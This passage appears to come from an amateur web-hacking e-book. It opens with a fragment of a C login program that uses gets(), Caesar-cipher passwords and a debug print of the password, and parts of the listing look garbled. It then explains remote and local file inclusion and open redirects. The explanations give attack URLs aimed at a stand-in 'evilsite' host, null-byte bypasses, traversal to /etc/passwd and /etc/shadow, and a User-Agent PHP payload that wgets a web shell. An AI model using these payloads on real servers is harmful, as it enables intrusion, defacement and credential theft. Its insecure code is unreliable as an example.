printf(" bob \t\t\t manitoba \t\t pdqlwred\n"); printf(" john \t\t\t inbombay \t\t lperpedb\n"); printf(" marc \t\t\t hiobiwan \t\t klrelzdq\n"); printf(" alice \t\t cometous \t\t frphwrxv\n"); init_list(&usr);
printf("Please enter your username (lowercase): "); gets(usrname);
if(strlen(usrname)>0)
pass_indx = get_indx(usrname, &usr); else
printf("You entered an invalid username.\nPlease try again.\nGoodbye!!\n"); if(pass_indx >= 0){
strcpy( sys_enc_pass, usr.passwd[pass_indx] ); //printf("The sys passwd is: %s\n",sys_enc_pass);
printf("Please enter the password for user %s: ", usrname); ch_tmp='\0'; i=0; for (;;){ ch_tmp = getch(); if(i==MAXLENGTH){ usrpasswd[i] = '\0'; i++; } if(ch_tmp=='\r'){ printf("\n"); break; } usrpasswd[i]=ch_tmp;
//putchar(ch_tmp); //uncomment this if you want to echo the password on the screen
putchar('*'); //comment this if you want to see the password instead of *
i++; }
//printf("The password you entered is: %s\n", usrpasswd); encode_passwd(usrpasswd, usr_enc_pass);
printf("<%s>,<%s>,<%s>,<%s>\n",usrname,usrpasswd,sys_enc_pass,usr_enc_pass); if( !strcmp( usr_enc_pass, sys_enc_pass ) ){
printf("Thank you, your password has been accepted.\nWelcome!!\n"); }
else{
printf("Sorry, your password was not accepted.\nPlease try again.\nGoodbye!!\n"); } } system("pause"); return 0; } /*
Encrypt the user entered password and return the caeser cipher back. The substitution is simply to replace an alphabet with a letter standing three places down the alphabet.
Also note, the replacement alphabets wrap around viz: z->c */
void encode_passwd(const char* s, char *r){ int i, ch;
for(i=0; i<MAXLENGTH; i++){ ch = s[i] + 3; if ( ch > 122 ) ch -= 26; r[i] = ch; } r[MAXLENGTH] = '\0'; } /*
check if the username exists in the database.
if does, get the index of its corresponding password. return -1 if the username is not found.
*/
int i;
for (i=0; i<LISTLENGTH; i++){
if(!strcmp(pch, u->unames[i])) break; } if(i<LISTLENGTH) return i; else{
printf("The username %s not found in database.\nPlease try again.\nGoodbye!!\n", pch);
return -1; }
} /*
store all the usernames and passwords in the usrlst structure. */
void init_list(struct usrlst *u){
u->unames[0]="joe"; u->passwd[0]="loryhpvx"; //ilovemsu u->unames[1]="bob"; u->passwd[1]="pdqlwred"; //manitoba u->unames[2]="john"; u->passwd[2]="lqerpedb"; //inbombay u->unames[3]="marc"; u->passwd[3]="klrelzdq"; //hiobiwan u->unames[4]="alice"; u->passwd[4]="frphwrxv"; //cometous
}
RFI
It’s not only input validation attacks which can damage a server but believe me RFI can do it also with the same ease. It is a vulnerability which allows an attacker to remotely include files on a server. It is easier than a sql injection. After
uploading a shell an attacker can root the server, deface website’s hosted on it, steal source code of website’s etc.
Demo of RFI
http://vulnerablesite.com/index.php? page=http://evilsite.com/shell.php
If the site opens an iframe on the current page then the website is vulnerable
Things Needed:
• Shell
• A webhost which will host your shell
• If it automatically adds extension to the file then we must use null byte “%00” (without quotes) to avoid any error
http://vulnerablesite.com/index.php? page=http://evilsite.com/shell.php%00
Else our request will become like below which is incorrect way
http://vulnerablesite.com/index.php? page=http://evilsite.com/shell.php.php
Impacts of RFI:
• Remote code Execution on a web server
• Code Execution on Client side
• Document Hijacking including Database it is stored o
• Source code theft
• DDos
LFI
LFI or Local File Inclusion is opposite of RFI in LFI file’s on the server are included rather than
remotely including as in RFI. In LFI an attacker can view as well as execute a local file in the server. After successfully exploiting a lfi vulnerability an attacker can execute remote code n the machine.
In a Unix based Server can get hold of some important files like /etc/passwd , /etc/shadow, /etc/release , /proc/self/eviron etc
Some of the important files which an attacker can get on a windows based machine
\boot.ini , \php.ini , \Program Files\Apache Software Foundation\Apache\conf\logs\access.log , \Program Files\Apache Software
Foundation\Apache\conf\logs\error.log etc; The Vulnerable URL look like this
http://www.vulnerablesite.com/index.php? page=../../../../../etc/passwd
or using a null byte if it add file extension automatically
http://www.vulnerablesite.com/index.php? page=../../../../../etc/passwd%00
(List of system accounts, username & hashes from /etc/passwd)
After finding a vulnerable site an attacker can execute code on the machine using user agent changer software. You can use this User Agent
Changer it has a easy GUI. An attacker changes the User Agent to the Code which he wants to get
executed. In below example attacker enter the following code
<?exec('wget http://www.shellsite.tld/shell.txt -O shell.php');?>
This code will upload a a shell in shell.txt form & later rename it to shell.php
Open Redirection
These vulnerabilities are affected in parameters of an application which redirect a user to the different website without validation.
This can cause a serious privacy threat to the user. An attacker can redirect a user to a phishing page or a specially crafted malicious page contacting malware thus can control victims PC from remote. An attacker can exploit this vulnerability like this
http://securesite.com/index.php? page=http://evilsite.tld
When a victim clicks on this URL victim will be redirected to the http://evilsite.tld without any validation. Thus an attacker can hijack accounts, install malware, redirect to phishing pages etc. This vulnerability is featured in many bug bounty programs & the payout is from 300$ - 500$ & even more.
About
This book has been written by Ubaid aka $cr1pt Kid33. Founder & Designer of
xedlgubaid.blogspot.com. This book has been written to aware about latest security threats. Author has been acknowledged by Paypal inc &
has found many security vulnerabilities in various internet giants. Feel free to contact
author at
mailto:[email protected]
“Thanks To All those who said no, it’s only because of them I did it myself”
